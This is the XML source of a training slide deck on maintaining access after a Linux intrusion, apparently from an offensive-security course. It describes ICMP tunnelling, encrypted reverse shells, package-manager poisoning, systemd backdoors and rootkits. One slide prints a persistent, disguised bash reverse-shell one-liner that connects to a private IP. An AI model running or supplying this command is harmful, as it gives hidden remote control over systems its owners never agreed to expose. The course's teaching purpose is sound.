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3" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="275" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="27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09567-4BB5-4DF6-AED1-862F80916FE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26EFC0-3588-4056-B2C3-BB985F035C56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>So far, we’ve looked at most of the stages of a offensive security such as: How to perform intelligence gathering, infiltration from the external perimeter and internal attacks.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E79CD2E-769A-43DC-B3C5-3201715A04F3}" type="parTrans" cxnId="{00C83634-E915-4D39-B61D-AA7052E80F43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CCC0052-2B74-4169-95C0-CB7337ECBBEF}" type="sibTrans" cxnId="{00C83634-E915-4D39-B61D-AA7052E80F43}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74C782B6-7092-489C-82E2-B422D5CDA12C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Now let's investigate the different methods in which we can maintain our access to the target system.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8530BA7C-5C91-4475-B6C2-F806C3A7B881}" type="parTrans" cxnId="{90C493FE-112B-464B-B760-8ABD3380E7EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA598319-2059-4B30-ABE4-A7FAC98C09EE}" type="sibTrans" cxnId="{90C493FE-112B-464B-B760-8ABD3380E7EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{086A2F4D-3210-49C2-8587-70E43A814152}" type="pres">
      <dgm:prSet presAssocID="{1EF09567-4BB5-4DF6-AED1-862F80916FE1}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CDA557A9-D7E1-4C20-9EBD-01B46E19A90A}" type="pres">
      <dgm:prSet presAssocID="{2526EFC0-3588-4056-B2C3-BB985F035C56}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B65A52E-0AA8-474A-BA3C-767070098129}" type="pres">
      <dgm:prSet presAssocID="{2526EFC0-3588-4056-B2C3-BB985F035C56}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C398B798-F85E-487F-B65B-FC30CCCF2DDE}" type="pres">
      <dgm:prSet presAssocID="{2526EFC0-3588-4056-B2C3-BB985F035C56}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB04946E-C189-4497-9966-C0094BCA052A}" type="pres">
      <dgm:prSet presAssocID="{2526EFC0-3588-4056-B2C3-BB985F035C56}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2451441-16E0-4CAA-833A-FC54BE336697}" type="pres">
      <dgm:prSet presAssocID="{74C782B6-7092-489C-82E2-B422D5CDA12C}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B2B1C77-0569-4B52-A1F8-662C1580A339}" type="pres">
      <dgm:prSet presAssocID="{74C782B6-7092-489C-82E2-B422D5CDA12C}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16D37C0A-C351-4D11-9137-41028C17522A}" type="pres">
      <dgm:prSet presAssocID="{74C782B6-7092-489C-82E2-B422D5CDA12C}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B22337FE-ED7B-4FE3-848C-497C9D01ACC8}" type="pres">
      <dgm:prSet presAssocID="{74C782B6-7092-489C-82E2-B422D5CDA12C}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{20287C07-43E9-49D1-9978-A0359BE07A74}" type="presOf" srcId="{2526EFC0-3588-4056-B2C3-BB985F035C56}" destId="{C398B798-F85E-487F-B65B-FC30CCCF2DDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{00C83634-E915-4D39-B61D-AA7052E80F43}" srcId="{1EF09567-4BB5-4DF6-AED1-862F80916FE1}" destId="{2526EFC0-3588-4056-B2C3-BB985F035C56}" srcOrd="0" destOrd="0" parTransId="{1E79CD2E-769A-43DC-B3C5-3201715A04F3}" sibTransId="{3CCC0052-2B74-4169-95C0-CB7337ECBBEF}"/>
    <dgm:cxn modelId="{0021404C-D5D4-487C-B99A-A8F74EA2A4B9}" type="presOf" srcId="{1EF09567-4BB5-4DF6-AED1-862F80916FE1}" destId="{086A2F4D-3210-49C2-8587-70E43A814152}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EE0A936E-3A37-4A0B-86C0-7483C3A4E175}" type="presOf" srcId="{74C782B6-7092-489C-82E2-B422D5CDA12C}" destId="{16D37C0A-C351-4D11-9137-41028C17522A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{90C493FE-112B-464B-B760-8ABD3380E7EB}" srcId="{1EF09567-4BB5-4DF6-AED1-862F80916FE1}" destId="{74C782B6-7092-489C-82E2-B422D5CDA12C}" srcOrd="1" destOrd="0" parTransId="{8530BA7C-5C91-4475-B6C2-F806C3A7B881}" sibTransId="{FA598319-2059-4B30-ABE4-A7FAC98C09EE}"/>
    <dgm:cxn modelId="{27CB3835-00A5-4873-90B4-658D5397EA31}" type="presParOf" srcId="{086A2F4D-3210-49C2-8587-70E43A814152}" destId="{CDA557A9-D7E1-4C20-9EBD-01B46E19A90A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9D2D2D79-2DFC-4894-890C-6D81B999AD68}" type="presParOf" srcId="{086A2F4D-3210-49C2-8587-70E43A814152}" destId="{6B65A52E-0AA8-474A-BA3C-767070098129}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{ADE62DB3-959D-42C7-A48D-3F6022379AF0}" type="presParOf" srcId="{6B65A52E-0AA8-474A-BA3C-767070098129}" destId="{C398B798-F85E-487F-B65B-FC30CCCF2DDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7B103EDA-6A63-4A86-8521-220BAE3C015D}" type="presParOf" srcId="{6B65A52E-0AA8-474A-BA3C-767070098129}" destId="{DB04946E-C189-4497-9966-C0094BCA052A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{C8CCBA0B-6D9A-4C94-93F8-F13C1D10219F}" type="presParOf" srcId="{086A2F4D-3210-49C2-8587-70E43A814152}" destId="{C2451441-16E0-4CAA-833A-FC54BE336697}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7D966554-4F86-4F52-B273-EEC71A02C628}" type="presParOf" srcId="{086A2F4D-3210-49C2-8587-70E43A814152}" destId="{3B2B1C77-0569-4B52-A1F8-662C1580A339}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D6748BFC-54C7-45E4-ABEC-B33DB7E8AB5E}" type="presParOf" srcId="{3B2B1C77-0569-4B52-A1F8-662C1580A339}" destId="{16D37C0A-C351-4D11-9137-41028C17522A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{2B2AB0A9-F5D8-4C9F-A9D1-085378905867}" type="presParOf" srcId="{3B2B1C77-0569-4B52-A1F8-662C1580A339}" destId="{B22337FE-ED7B-4FE3-848C-497C9D01AC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557A9-D7E1-4C20-9EBD-01B46E19A90A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="59801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8B798-F85E-487F-B65B-FC30CCCF2DDE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="5980170" cy="266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So far, we’ve looked at most of the stages of a offensive security such as: How to perform intelligence gathering, infiltration from the external perimeter and internal attacks.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="5980170" cy="2668525"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2451441-16E0-4CAA-833A-FC54BE336697}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2668525"/>
          <a:ext cx="5980170" cy="0"/>
        </a:xfrm>
        <a:prstGeom prst="line">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="1503438"/>
            <a:satOff val="-683"/>
            <a:lumOff val="6862"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:hueOff val="1503438"/>
              <a:satOff val="-683"/>
              <a:lumOff val="6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7C0A-C351-4D11-9137-41028C17522A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2668525"/>
          <a:ext cx="5980170" cy="266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Now let's investigate the different methods in which we can maintain our access to the target system.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2668525"/>
        <a:ext cx="5980170" cy="2668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202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4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0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4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5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3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4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0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6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4/8/2022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5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C84039B-8CF9-47CD-8F02-B1DBD5E75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EDA5FB4F-26F9-8115-5475-4C520974D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48D8C7A8-9E05-4465-8B1B-577C9F1DB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9C920-256A-4E20-A184-4A53D8C76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7059"/>
            <a:ext cx="5989320" cy="27629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Access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19C2C-C585-4D23-ABB0-604B8CB4C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10000"/>
            <a:ext cx="5989320" cy="1524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Offensive Security Tactics for Linux Professionals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5ADC7-AA4C-45CF-B442-7BDB4997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Poisoning the Package Manager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E1AA8-37D3-47E3-A36A-49DF3C4A0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dirty="0"/>
              <a:t>A common action any target will take is update their systems after an attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Let's say all our traces of attack have been removed and we can no longer get back in. We can let the attacker open a pathway back up for us.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426334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unching tubes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD78064D-A8BA-44F9-503D-35F14D73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982AD0-6B29-4C72-8F4E-229BAA86C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3917"/>
            <a:ext cx="12192000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1FDC3-1D7A-4D0D-AED6-26B81796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307069"/>
            <a:ext cx="11143672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Persistent Bash Payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414265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E1D6E-8DE2-4813-A6B5-5CA25698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Persistent Bash Payload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7A4D-1C61-4BCC-BFD7-89E07F8C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dirty="0"/>
              <a:t>Using a bash process, we can narrow down any existing processes and be able to clone the name of this process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Combined with a persistent bash shell payload which will repeatedly attempt to connect to our C&amp;C via IP/Port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>From this point we can always re-connect if our C&amp;C dies or (we’ve all done it at some point) we kill our shell by accident.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1588278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E1D6E-8DE2-4813-A6B5-5CA25698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Persistent Bash Payload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7A4D-1C61-4BCC-BFD7-89E07F8C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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>P=( $(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ps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-u "$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USER"|awk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'{print $4}'|tr -d '[0-9:/:A-Z]._-') );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cS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="${P["$[RANDOM % ${#P[@]}]"]}";cp /bin/bash /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/$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cS;while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true;do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sleep 9 &amp;&amp; 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nohup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/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/"$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cS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" -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i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&gt;&amp; /dev/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tcp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/192.168.0.70/8080 0&gt;&amp;1;done &amp; disown; exit 2&gt;/dev/null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04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5BF8E-BD3C-4116-8894-A4E5AA7F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43804"/>
            <a:ext cx="4102609" cy="3793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dirty="0"/>
              <a:t>Why do we need persistent connections?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Stream Music Maker - Why Pastor Remix - Shorty by Brady Goodman | Listen  online for free on SoundCloud">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A2CF73-C89A-449F-AAE6-23628FD7E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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5349241" y="10"/>
            <a:ext cx="684275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47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keleton sitting on a chair&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77907B43-D5B3-4BBE-9765-DB3100BC0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" r="-2" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="758952"/>
            <a:ext cx="3890922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7A4D-1C61-4BCC-BFD7-89E07F8C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In case we accidentally kill our shell and end up like this guy…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27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E9B3-34CC-4B02-BF41-6C1D08E0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Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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504D-6A04-4ECF-B944-7697C6200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systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> process within the target system which helps us to add our own backdoor commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can make these processes persistent by “enabling” them which allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the backdoor to be active upon boot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> processes are used for everyday Linux services, however we can use this offensively for ourselves to add a backdoor.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6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E9B3-34CC-4B02-BF41-6C1D08E0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Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Services: An example.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888B5-7A2C-41D5-BF2A-E4A728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66" y="2976419"/>
            <a:ext cx="6848326" cy="25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8E9B3-34CC-4B02-BF41-6C1D08E0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650"/>
            <a:ext cx="9899650" cy="13446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Rootkits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504D-6A04-4ECF-B944-7697C6200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13"/>
            <a:ext cx="9899650" cy="312578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/>
              <a:t>Rootkits are a very specialized aspect of post-exploitation/maintaining access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>Not covered in this course but it is encouraged to explore methods of rootkits to manipulate target filesystems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>The benefits of this involves the ability to deeply hide malicious traces of connections, files and other essential components. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1569849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26A30-DCEE-4CCE-B075-7A118A67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AA5F-4648-4034-86A3-72F342C2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69902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After the engagement maintaining access should be established from many avenues anticipating defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95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5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Maintaining access is a step which an attacker is going to take, how long we remain undetected for is a measurement of the monitoring defenses in place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95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5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Maintaining access should only be done if client has agreed to this in scope.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395802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7D5A6-B505-4A53-8CEA-82BB24B7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>
                <a:latin typeface="Aldhabi" panose="01000000000000000000" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Aldhabi" panose="01000000000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Recap</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="80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118E47E-97D0-3834-FA5C-9A9DF40C6F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151463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466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07AC00-8EDD-4050-AC8D-6DF972FD90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 b="3192"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="121919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FA38E-FCEF-444E-B8E4-D0D0D621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1"/>
            <a:ext cx="3880511" cy="157784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A5050-FAF7-414C-A0A5-41A1CC50A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11718"/>
            <a:ext cx="3880511" cy="3514164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000" dirty="0"/>
              <a:t>ICMP Tunnelling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Encrypted OpenSSL Reverse Shell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Poisoning the Package Manager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Persistent Bash Payload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Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> services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Rootkits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Underwater bubble">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C07328BC-B1E9-7621-2999-D4B675B83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4" r="19541" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401463" y="10"/>
            <a:ext cx="67905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3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indoor architecture">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6638F8CD-B2FF-BD65-44CA-167F1B7DB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82AD0-6B29-4C72-8F4E-229BAA86C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3917"/>
            <a:ext cx="12192000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80DC8-225F-4435-907F-B551975F6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307069"/>
            <a:ext cx="11334924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ICMP Tunnelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311786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749A2-F058-4013-ABD5-F9BA71E8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1"/>
            <a:ext cx="3880511" cy="157784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ICMP Tunnelling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C6CB-D469-431C-B684-CB67E5610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11717"/>
            <a:ext cx="3880511" cy="395100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topic we have covered before which not only supports in exfiltration of data but to maintain a stealthy access channel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95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5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With ICMP echo request/reply packets we can form a communications channel which does not run on the ports, we can also layer over this with SSH using a tool icmptunnel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BA6BC071-9C85-5541-F4A0-0D614865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2" r="36161"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5401463" y="10"/>
            <a:ext cx="67905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3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y-coloured shell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C64462-E490-6CE5-4F45-157CA563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82AD0-6B29-4C72-8F4E-229BAA86C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3917"/>
            <a:ext cx="12192000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8E18B-6C72-4ADE-AE45-C315D578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307069"/>
            <a:ext cx="11291454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dirty="0"/>
              <a:t>Encrypted OpenSSL Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34761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38015-0D9C-4349-B941-8E82CDF84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1430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Encrypted OpenSSL Reverse Shell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3CF4B4-1EB3-4904-B76F-B87489565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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If there is a well-known network port available for us to perform communications (No egress filtering), encryption is recommended.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With self-signed OpenSSL certificates, we can use the barebones mkfifo method to create encrypted communications with an external C&amp;C should our SSH keys be compromised.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50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Stacked brown boxes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC5B5BE7-67E1-8F68-7171-5219E7C90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0" b="1001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C982AD0-6B29-4C72-8F4E-229BAA86C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07575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A51AC-D557-44AB-898D-A3540C3F6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80728"/>
            <a:ext cx="11097491" cy="9640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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Poisoning the Package Manager</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82272466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Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>57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Aharoni</vt:lpstr>
      <vt:lpstr>Aldhabi</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Avenir Next LT Pro</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>PrismaticVTI</vt:lpstr>
      <vt:lpstr>Maintaining Access</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>ICMP Tunnelling</vt:lpstr>
      <vt:lpstr>ICMP Tunnelling</vt:lpstr>
      <vt:lpstr>Encrypted OpenSSL Reverse Shell</vt:lpstr>
      <vt:lpstr>Encrypted OpenSSL Reverse Shell</vt:lpstr>
      <vt:lpstr>Poisoning the Package Manager</vt:lpstr>
      <vt:lpstr>Poisoning the Package Manager</vt:lpstr>
      <vt:lpstr>Persistent Bash Payload</vt:lpstr>
      <vt:lpstr>Persistent Bash Payload</vt:lpstr>
      <vt:lpstr>Persistent Bash Payload</vt:lpstr>
      <vt:lpstr>Why do we need persistent connections?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Persistent Systemd Services</vt:lpstr>
      <vt:lpstr>Persistent Systemd Services: An example.</vt:lpstr>
      <vt:lpstr>Rootkits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HUSSAIN, AQEEB R.</dc:creator>
  <cp:lastModifiedBy>HUSSAIN, AQEEB R.</cp:lastModifiedBy>
  <cp:revision>201</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-24T16:29:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-08T12:40:07Z</dcterms:modified>
</cp:coreProperties>
</file>